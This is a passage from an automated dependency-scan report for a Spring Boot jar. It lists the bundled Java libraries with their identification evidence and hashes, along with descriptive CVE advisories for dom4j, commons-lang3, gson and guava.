Evidence Type Source Name Value Confidence Vendor file name commons-collections4 High Vendor jar package name apache Highest Vendor jar package name collections4 Highest Vendor jar package name commons Highest Vendor Manifest bundle-docurl http://commons.apache.org/proper/commons-collections/ Low Vendor Manifest bundle-symbolicname org.apache.commons.collections4 Medium Vendor Manifest implementation-build tags/COLLECTIONS_4_1_RC2@r1716550; 2015-11-25 22:53:13+0100 Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-collections4 Low Vendor pom developer id adriannistor Medium Vendor pom developer id amamment Medium Vendor pom developer id bayard Medium Vendor pom developer id craigmcc Medium Vendor pom developer id dlaha Medium Vendor pom developer id geirm Medium Vendor pom developer id ggregory Medium Vendor pom developer id jcarman Medium Vendor pom developer id luc Medium Vendor pom developer id matth Medium Vendor pom developer id mbenson Medium Vendor pom developer id morgand Medium Vendor pom developer id psteitz Medium Vendor pom developer id rdonkin Medium Vendor pom developer id rwaldhoff Medium Vendor pom developer id scolebourne Medium Vendor pom developer id tn Medium Vendor pom developer name Adrian Nistor Medium Vendor pom developer name Arun M. Thomas Medium Vendor pom developer name Craig McClanahan Medium Vendor pom developer name Dipanjan Laha Medium Vendor pom developer name Gary D. Gregory Medium Vendor pom developer name Geir Magnusson Medium Vendor pom developer name Henri Yandell Medium Vendor pom developer name James Carman Medium Vendor pom developer name Luc Maisonobe Medium Vendor pom developer name Matt Benson Medium Vendor pom developer name Matthew Hawthorne Medium Vendor pom developer name Morgan Delagrange Medium Vendor pom developer name Phil Steitz Medium Vendor pom developer name Robert Burrell Donkin Medium Vendor pom developer name Rodney Waldhoff Medium Vendor pom developer name Stephen Colebourne Medium Vendor pom developer name Thomas Neidhart Medium Vendor pom groupid org.apache.commons Highest Vendor pom name Apache Commons Collections High Vendor pom parent-artifactid commons-parent Low Vendor pom url http://commons.apache.org/proper/commons-collections/ Highest Product file name commons-collections4 High Product jar package name apache Highest Product jar package name collections4 Highest Product jar package name commons Highest Product Manifest bundle-docurl http://commons.apache.org/proper/commons-collections/ Low Product Manifest Bundle-Name Apache Commons Collections Medium Product Manifest bundle-symbolicname org.apache.commons.collections4 Medium Product Manifest implementation-build tags/COLLECTIONS_4_1_RC2@r1716550; 2015-11-25 22:53:13+0100 Low Product Manifest Implementation-Title Apache Commons Collections High Product Manifest specification-title Apache Commons Collections Medium Product pom artifactid commons-collections4 Highest Product pom developer id adriannistor Low Product pom developer id amamment Low Product pom developer id bayard Low Product pom developer id craigmcc Low Product pom developer id dlaha Low Product pom developer id geirm Low Product pom developer id ggregory Low Product pom developer id jcarman Low Product pom developer id luc Low Product pom developer id matth Low Product pom developer id mbenson Low Product pom developer id morgand Low Product pom developer id psteitz Low Product pom developer id rdonkin Low Product pom developer id rwaldhoff Low Product pom developer id scolebourne Low Product pom developer id tn Low Product pom developer name Adrian Nistor Low Product pom developer name Arun M. Thomas Low Product pom developer name Craig McClanahan Low Product pom developer name Dipanjan Laha Low Product pom developer name Gary D. Gregory Low Product pom developer name Geir Magnusson Low Product pom developer name Henri Yandell Low Product pom developer name James Carman Low Product pom developer name Luc Maisonobe Low Product pom developer name Matt Benson Low Product pom developer name Matthew Hawthorne Low Product pom developer name Morgan Delagrange Low Product pom developer name Phil Steitz Low Product pom developer name Robert Burrell Donkin Low Product pom developer name Rodney Waldhoff Low Product pom developer name Stephen Colebourne Low Product pom developer name Thomas Neidhart Low Product pom groupid org.apache.commons Highest Product pom name Apache Commons Collections High Product pom parent-artifactid commons-parent Medium Product pom url http://commons.apache.org/proper/commons-collections/ Medium Version file version 4.1 High Version Manifest Implementation-Version 4.1 High Version pom parent-version 4.1 Low Version pom version 4.1 Highest
spring-music-sqldb-1.0.jar: commons-lang3-3.7.jarDescription:
Apache Commons Lang, a package of Java utility classes for the
classes that are in java.lang's hierarchy, or are considered to be so
standard as to justify existence in java.lang.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/commons-lang3-3.7.jar
MD5: f1df5623d78c432b7c3d58ff491e1801
SHA1: 557edd918fd41f9260963583ebf5a61a43a6b423
SHA256: 6e8dc31e046508d9953c96534edf0c2e0bfe6f468966b5b842b3f87e43b6a847
Evidence Type Source Name Value Confidence Vendor file name commons-lang3 High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name lang3 Highest Vendor Manifest automatic-module-name org.apache.commons.lang3 Medium Vendor Manifest bundle-docurl http://commons.apache.org/proper/commons-lang/ Low Vendor Manifest bundle-symbolicname org.apache.commons.lang3 Medium Vendor Manifest implementation-url http://commons.apache.org/proper/commons-lang/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.commons Medium Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-lang3 Low Vendor pom developer email bayard@apache.org Low Vendor pom developer email britter@apache.org Low Vendor pom developer email chtompki@apache.org Low Vendor pom developer email djones@apache.org Low Vendor pom developer email dlr@finemaltcoding.com Low Vendor pom developer email ggregory@apache.org Low Vendor pom developer email jcarman@apache.org Low Vendor pom developer email joerg.schaible@gmx.de Low Vendor pom developer email lguibert@apache.org Low Vendor pom developer email oheger@apache.org Low Vendor pom developer email pbenedict@apache.org Low Vendor pom developer email rdonkin@apache.org Low Vendor pom developer email scolebourne@joda.org Low Vendor pom developer email stevencaswell@apache.org Low Vendor pom developer id bayard Medium Vendor pom developer id britter Medium Vendor pom developer id chtompki Medium Vendor pom developer id djones Medium Vendor pom developer id dlr Medium Vendor pom developer id fredrik Medium Vendor pom developer id ggregory Medium Vendor pom developer id jcarman Medium Vendor pom developer id joehni Medium Vendor pom developer id lguibert Medium Vendor pom developer id mbenson Medium Vendor pom developer id niallp Medium Vendor pom developer id oheger Medium Vendor pom developer id pbenedict Medium Vendor pom developer id rdonkin Medium Vendor pom developer id scaswell Medium Vendor pom developer id scolebourne Medium Vendor pom developer name Benedikt Ritter Medium Vendor pom developer name Daniel Rall Medium Vendor pom developer name Duncan Jones Medium Vendor pom developer name Fredrik Westermarck Medium Vendor pom developer name Gary D. Gregory Medium Vendor pom developer name Henri Yandell Medium Vendor pom developer name James Carman Medium Vendor pom developer name Joerg Schaible Medium Vendor pom developer name Loic Guibert Medium Vendor pom developer name Matt Benson Medium Vendor pom developer name Niall Pemberton Medium Vendor pom developer name Oliver Heger Medium Vendor pom developer name Paul Benedict Medium Vendor pom developer name Rob Tompkins Medium Vendor pom developer name Robert Burrell Donkin Medium Vendor pom developer name Stephen Colebourne Medium Vendor pom developer name Steven Caswell Medium Vendor pom developer org Carman Consulting, Inc. Medium Vendor pom developer org CollabNet, Inc. Medium Vendor pom developer org SITA ATS Ltd Medium Vendor pom groupid org.apache.commons Highest Vendor pom name Apache Commons Lang High Vendor pom parent-artifactid commons-parent Low Vendor pom url http://commons.apache.org/proper/commons-lang/ Highest Product file name commons-lang3 High Product jar package name apache Highest Product jar package name commons Highest Product jar package name lang3 Highest Product Manifest automatic-module-name org.apache.commons.lang3 Medium Product Manifest bundle-docurl http://commons.apache.org/proper/commons-lang/ Low Product Manifest Bundle-Name Apache Commons Lang Medium Product Manifest bundle-symbolicname org.apache.commons.lang3 Medium Product Manifest Implementation-Title Apache Commons Lang High Product Manifest implementation-url http://commons.apache.org/proper/commons-lang/ Low Product Manifest specification-title Apache Commons Lang Medium Product pom artifactid commons-lang3 Highest Product pom developer email bayard@apache.org Low Product pom developer email britter@apache.org Low Product pom developer email chtompki@apache.org Low Product pom developer email djones@apache.org Low Product pom developer email dlr@finemaltcoding.com Low Product pom developer email ggregory@apache.org Low Product pom developer email jcarman@apache.org Low Product pom developer email joerg.schaible@gmx.de Low Product pom developer email lguibert@apache.org Low Product pom developer email oheger@apache.org Low Product pom developer email pbenedict@apache.org Low Product pom developer email rdonkin@apache.org Low Product pom developer email scolebourne@joda.org Low Product pom developer email stevencaswell@apache.org Low Product pom developer id bayard Low Product pom developer id britter Low Product pom developer id chtompki Low Product pom developer id djones Low Product pom developer id dlr Low Product pom developer id fredrik Low Product pom developer id ggregory Low Product pom developer id jcarman Low Product pom developer id joehni Low Product pom developer id lguibert Low Product pom developer id mbenson Low Product pom developer id niallp Low Product pom developer id oheger Low Product pom developer id pbenedict Low Product pom developer id rdonkin Low Product pom developer id scaswell Low Product pom developer id scolebourne Low Product pom developer name Benedikt Ritter Low Product pom developer name Daniel Rall Low Product pom developer name Duncan Jones Low Product pom developer name Fredrik Westermarck Low Product pom developer name Gary D. Gregory Low Product pom developer name Henri Yandell Low Product pom developer name James Carman Low Product pom developer name Joerg Schaible Low Product pom developer name Loic Guibert Low Product pom developer name Matt Benson Low Product pom developer name Niall Pemberton Low Product pom developer name Oliver Heger Low Product pom developer name Paul Benedict Low Product pom developer name Rob Tompkins Low Product pom developer name Robert Burrell Donkin Low Product pom developer name Stephen Colebourne Low Product pom developer name Steven Caswell Low Product pom developer org Carman Consulting, Inc. Low Product pom developer org CollabNet, Inc. Low Product pom developer org SITA ATS Ltd Low Product pom groupid org.apache.commons Highest Product pom name Apache Commons Lang High Product pom parent-artifactid commons-parent Medium Product pom url http://commons.apache.org/proper/commons-lang/ Medium Version file version 3.7 High Version Manifest Implementation-Version 3.7 High Version pom parent-version 3.7 Low Version pom version 3.7 Highest
CVE-2025-48924 (OSSINDEX) suppress
Uncontrolled Recursion vulnerability in Apache Commons Lang.
This issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0.
The methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a
StackOverflowError could cause an application to stop.
Users are recommended to upgrade to version 3.18.0, which fixes the issue.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2025-48924 for details CWE-674 Uncontrolled Recursion
CVSSv2:
Base Score: MEDIUM (6.900000095367432) Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.apache.commons:commons-lang3:3.7:*:*:*:*:*:*:* spring-music-sqldb-1.0.jar: converter-jackson-2.1.0.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/converter-jackson-2.1.0.jarMD5: 2a99e66ead438dd054375c3a6b6e37b4SHA1: ef33476a62d9c62dfca6b6c9e086f2e3343a96f4SHA256: 1a5522419639b6261b70e9011606954be5ae2c260392c737698bf3cae02929c8
Evidence Type Source Name Value Confidence Vendor file name converter-jackson High Vendor jar package name converter Highest Vendor jar package name converter Low Vendor jar package name jackson Highest Vendor jar package name jackson Low Vendor jar package name retrofit2 Highest Vendor jar package name retrofit2 Low Vendor pom artifactid converter-jackson Low Vendor pom groupid com.squareup.retrofit2 Highest Vendor pom name Converter: Jackson High Vendor pom parent-artifactid retrofit-converters Low Product file name converter-jackson High Product jar package name converter Highest Product jar package name converter Low Product jar package name jackson Highest Product jar package name jackson Low Product jar package name retrofit2 Highest Product pom artifactid converter-jackson Highest Product pom groupid com.squareup.retrofit2 Highest Product pom name Converter: Jackson High Product pom parent-artifactid retrofit-converters Medium Version file version 2.1.0 High Version pom version 2.1.0 Highest
spring-music-sqldb-1.0.jar: dom4j-1.6.1.jarDescription:
dom4j: the flexible XML framework for Java File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/dom4j-1.6.1.jarMD5: 4d8f51d3fe3900efc6e395be48030d6dSHA1: 5d3ccc056b6f056dbf0dddfdf43894b9065a8f94SHA256: 593552ffea3c5823c6602478b5002a7c525fd904a3c44f1abe4065c22edfac73
Evidence Type Source Name Value Confidence Vendor central artifactid dom4j High Vendor central artifactid dom4j-1.6.1 High Vendor central groupid dom4j High Vendor central groupid org.zenframework.z8.dependencies.commons High Vendor file name dom4j High Vendor jar package name dom4j Highest Vendor jar package name dom4j Low Vendor Manifest extension-name dom4j Medium Vendor Manifest Implementation-Vendor MetaStuff Ltd. High Vendor Manifest specification-vendor MetaStuff Ltd. Low Vendor pom artifactid dom4j Low Vendor pom artifactid dom4j-1.6.1 Low Vendor pom developer email carnold@users.sourceforge.net Low Vendor pom developer email ddlucas@users.sourceforge.net Low Vendor pom developer email drwhite@users.sourceforge.net Low Vendor pom developer email jjenkov@users.sourceforge.net Low Vendor pom developer email jstrachan@apache.org Low Vendor pom developer email laramiec@users.sourceforge.net Low Vendor pom developer email maartenc@users.sourceforge.net Low Vendor pom developer email mskells@users.sourceforge.net Low Vendor pom developer email nicksanderson@users.sourceforge.net Low Vendor pom developer email slehmann@users.sourceforge.net Low Vendor pom developer email tradem@users.sourceforge.net Low Vendor pom developer email werken@users.sourceforge.net Low Vendor pom developer email wolfftw@users.sourceforge.net Low Vendor pom developer email yeekee@users.sourceforge.net Low Vendor pom developer email yruan2@users.sourceforge.net Low Vendor pom developer id carnold Medium Vendor pom developer id ddlucas Medium Vendor pom developer id drwhite Medium Vendor pom developer id jjenkov Medium Vendor pom developer id jstrachan Medium Vendor pom developer id laramiec Medium Vendor pom developer id maartenc Medium Vendor pom developer id mskells Medium Vendor pom developer id nicksanderson Medium Vendor pom developer id slehmann Medium Vendor pom developer id tradem Medium Vendor pom developer id werken Medium Vendor pom developer id wolfftw Medium Vendor pom developer id yeekee Medium Vendor pom developer id yruan2 Medium Vendor pom developer name Bob McWhirter Medium Vendor pom developer name Curt Arnold Medium Vendor pom developer name David Lucas Medium Vendor pom developer name David White Medium Vendor pom developer name Jakob Jenkov Medium Vendor pom developer name James Strachan Medium Vendor pom developer name Laramie Crocker Medium Vendor pom developer name Maarten Coene Medium Vendor pom developer name Michael Skells Medium Vendor pom developer name Nick Sanderson Medium Vendor pom developer name OuYang Chen Medium Vendor pom developer name Steen Lehmann Medium Vendor pom developer name Tobias Rademacher Medium Vendor pom developer name Todd Wolff Medium Vendor pom developer name Yuxin Ruan Medium Vendor pom developer org Cronos Medium Vendor pom developer org SpiritSoft, Inc. Medium Vendor pom groupid dom4j Highest Vendor pom groupid org.zenframework.z8.dependencies.commons Highest Vendor pom name dom4j High Vendor pom name Zenframework Z8 Dependencies - Commons - dom4j-1.6.1 High Vendor pom organization name MetaStuff Ltd. High Vendor pom organization url http://sourceforge.net/projects/dom4j Medium Vendor pom parent-artifactid z8-dependencies Low Vendor pom parent-groupid org.zenframework.z8.dependencies Medium Vendor pom url http://dom4j.org Highest Product central artifactid dom4j High Product central artifactid dom4j-1.6.1 High Product file name dom4j High Product jar package name dom4j Highest Product Manifest extension-name dom4j Medium Product Manifest Implementation-Title org.dom4j High Product Manifest specification-title dom4j : XML framework for Java Medium Product pom artifactid dom4j Highest Product pom artifactid dom4j-1.6.1 Highest Product pom developer email carnold@users.sourceforge.net Low Product pom developer email ddlucas@users.sourceforge.net Low Product pom developer email drwhite@users.sourceforge.net Low Product pom developer email jjenkov@users.sourceforge.net Low Product pom developer email jstrachan@apache.org Low Product pom developer email laramiec@users.sourceforge.net Low Product pom developer email maartenc@users.sourceforge.net Low Product pom developer email mskells@users.sourceforge.net Low Product pom developer email nicksanderson@users.sourceforge.net Low Product pom developer email slehmann@users.sourceforge.net Low Product pom developer email tradem@users.sourceforge.net Low Product pom developer email werken@users.sourceforge.net Low Product pom developer email wolfftw@users.sourceforge.net Low Product pom developer email yeekee@users.sourceforge.net Low Product pom developer email yruan2@users.sourceforge.net Low Product pom developer id carnold Low Product pom developer id ddlucas Low Product pom developer id drwhite Low Product pom developer id jjenkov Low Product pom developer id jstrachan Low Product pom developer id laramiec Low Product pom developer id maartenc Low Product pom developer id mskells Low Product pom developer id nicksanderson Low Product pom developer id slehmann Low Product pom developer id tradem Low Product pom developer id werken Low Product pom developer id wolfftw Low Product pom developer id yeekee Low Product pom developer id yruan2 Low Product pom developer name Bob McWhirter Low Product pom developer name Curt Arnold Low Product pom developer name David Lucas Low Product pom developer name David White Low Product pom developer name Jakob Jenkov Low Product pom developer name James Strachan Low Product pom developer name Laramie Crocker Low Product pom developer name Maarten Coene Low Product pom developer name Michael Skells Low Product pom developer name Nick Sanderson Low Product pom developer name OuYang Chen Low Product pom developer name Steen Lehmann Low Product pom developer name Tobias Rademacher Low Product pom developer name Todd Wolff Low Product pom developer name Yuxin Ruan Low Product pom developer org Cronos Low Product pom developer org SpiritSoft, Inc. Low Product pom groupid dom4j Highest Product pom groupid org.zenframework.z8.dependencies.commons Highest Product pom name dom4j High Product pom name Zenframework Z8 Dependencies - Commons - dom4j-1.6.1 High Product pom organization name MetaStuff Ltd. Low Product pom organization url http://sourceforge.net/projects/dom4j Low Product pom parent-artifactid z8-dependencies Medium Product pom parent-groupid org.zenframework.z8.dependencies Medium Product pom url http://dom4j.org Medium Version central version 1.6.1 High Version file version 1.6.1 High Version Manifest Implementation-Version 1.6.1 High Version pom version 1.6.1 Highest
CVE-2020-10683 suppress
dom4j before 2.0.3 and 2.1.x before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j. CWE-611 Improper Restriction of XML External Entity Reference
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
OSSINDEX - [CVE-2020-10683] CWE-611: Improper Restriction of XML External Entity Reference ('XXE') OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-10683 OSSIndex - https://bugzilla.redhat.com/show_bug.cgi?id=1694235 af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2018-1000632 (OSSINDEX) suppress
dom4j version prior to version 2.1.1 contains a CWE-91: XML Injection vulnerability in Class: Element. Methods: addElement, addAttribute that can result in an attacker tampering with XML documents through XML injection. This attack appear to be exploitable via an attacker specifying attributes or elements in the XML document. This vulnerability appears to have been fixed in 2.1.1 or later. CWE-91 XML Injection (aka Blind XPath Injection)
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:dom4j:dom4j:1.6.1:*:*:*:*:*:*:* spring-music-sqldb-1.0.jar: gson-2.8.2.jarDescription:
Gson JSON library File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/gson-2.8.2.jarMD5: 2330bde3467e7cfec44d38e74f27dab8SHA1: 3edcfe49d2c6053a70a2a47e4e1c2f94998a49cfSHA256: b7134929f7cc7c04021ec1cc27ef63ab907e410cf0588e397b8851181eb91092
Evidence Type Source Name Value Confidence Vendor file name gson High Vendor jar package name google Highest Vendor jar package name gson Highest Vendor Manifest bundle-contactaddress https://github.com/google/gson Low Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5, JavaSE-1.6, JavaSE-1.7, JavaSE-1.8 Low Vendor Manifest bundle-symbolicname com.google.gson Medium Vendor pom artifactid gson Low Vendor pom groupid com.google.code.gson Highest Vendor pom name Gson High Vendor pom parent-artifactid gson-parent Low Product file name gson High Product jar package name google Highest Product jar package name gson Highest Product Manifest bundle-contactaddress https://github.com/google/gson Low Product Manifest Bundle-Name Gson Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5, JavaSE-1.6, JavaSE-1.7, JavaSE-1.8 Low Product Manifest bundle-symbolicname com.google.gson Medium Product pom artifactid gson Highest Product pom groupid com.google.code.gson Highest Product pom name Gson High Product pom parent-artifactid gson-parent Medium Version file version 2.8.2 High Version Manifest Bundle-Version 2.8.2 High Version pom version 2.8.2 Highest
CVE-2022-25647 suppress
The package com.google.code.gson:gson before 2.8.9 are vulnerable to Deserialization of Untrusted Data via the writeReplace() method in internal classes, which may lead to DoS attacks. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2025-53864 (OSSINDEX) suppress
github.com/sigstore/sigstore-java (gson) - Stack-based Buffer Overflow [CVE-2025-53864]
A stack-based buffer overflow condition is a condition where the buffer being overwritten is allocated on the stack (i.e., is a local variable or, rarely, a parameter to a function). CWE-121 Stack-based Buffer Overflow
CVSSv2:
Base Score: MEDIUM (6.900000095367432) Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:com.google.code.gson:gson:2.8.2:*:*:*:*:*:*:* spring-music-sqldb-1.0.jar: guava-20.0.jarDescription:
Guava is a suite of core and expanded libraries that include
utility classes, google's collections, io classes, and much
much more.
Guava has only one code dependency - javax.annotation,
per the JSR-305 spec.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/guava-20.0.jar
MD5: f32a8a2524620dbecc9f6bf6a20c293f
SHA1: 89507701249388e1ed5ddcf8c41f4ce1be7831ef
SHA256: 36a666e3b71ae7f0f0dca23654b67e086e6c93d192f60ba5dfd5519db6c288c8
Evidence Type Source Name Value Confidence Vendor file name guava High Vendor jar package name google Highest Vendor Manifest bundle-docurl https://github.com/google/guava/ Low Vendor Manifest bundle-symbolicname com.google.guava Medium Vendor pom artifactid guava Low Vendor pom groupid com.google.guava Highest Vendor pom name Guava: Google Core Libraries for Java High Vendor pom parent-artifactid guava-parent Low Product file name guava High Product jar package name google Highest Product Manifest bundle-docurl https://github.com/google/guava/ Low Product Manifest Bundle-Name Guava: Google Core Libraries for Java Medium Product Manifest bundle-symbolicname com.google.guava Medium Product pom artifactid guava Highest Product pom groupid com.google.guava Highest Product pom name Guava: Google Core Libraries for Java High Product pom parent-artifactid guava-parent Medium Version file version 20.0 High Version pom version 20.0 Highest
CVE-2023-2976 suppress
Use of Java's default temporary directory for file creation in `FileBackedOutputStream` in Google Guava versions 1.0 to 31.1 on Unix systems and Android Ice Cream Sandwich allows other users and apps on the machine with access to the default Java temporary directory to be able to access the files created by the class.
Even though the security vulnerability is fixed in version 32.0.0, we recommend using version 32.0.1 as version 32.0.0 breaks some functionality under Windows. CWE-552 Files or Directories Accessible to External Parties
CVSSv3:
Base Score: HIGH (7.1) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N/E:1.8/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2018-10237 suppress
Unbounded memory allocation in Google Guava 11.0 through 24.x before 24.1.1 allows remote attackers to conduct denial of service attacks against servers that depend on this library and deserialize attacker-provided data, because the AtomicDoubleArray class (when serialized with Java serialization) and the CompoundOrdering class (when serialized with GWT serialization) perform eager allocation without appropriate checks on what a client has sent and whether the data size is reasonable. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2020-8908 suppress
A temp directory creation vulnerability exists in all versions of Guava, allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava API com.google.common.io.Files.createTempDir(). By default, on unix-like systems, the created directory is world-readable (readable by an attacker with access to the system). The method in question has been marked @Deprecated in versions 30.0 and later and should not be used. For Android developers, we recommend choosing a temporary directory API provided by Android, such as context.getCacheDir(). For other Java developers, we recommend migrating to the Java 7 API java.nio.file.Files.createTempDirectory() which explicitly configures permissions of 700, or configuring the Java runtime's java.io.tmpdir system property to point to a location whose permissions are appropriately configured.
CWE-378 Creation of Temporary File With Insecure Permissions, CWE-732 Incorrect Permission Assignment for Critical Resource
CVSSv3:
Base Score: LOW (3.3) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:1.8/RC:R/MAV:A CVSSv2:
Base Score: LOW (2.1) Vector: /AV:L/AC:L/Au:N/C:P/I:N/A:N References:
OSSINDEX - [CVE-2020-8908] CWE-379: Creation of Temporary File in Directory with Incorrect Permissions OSSIndex - https://github.com/google/guava/issues/4011 af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY 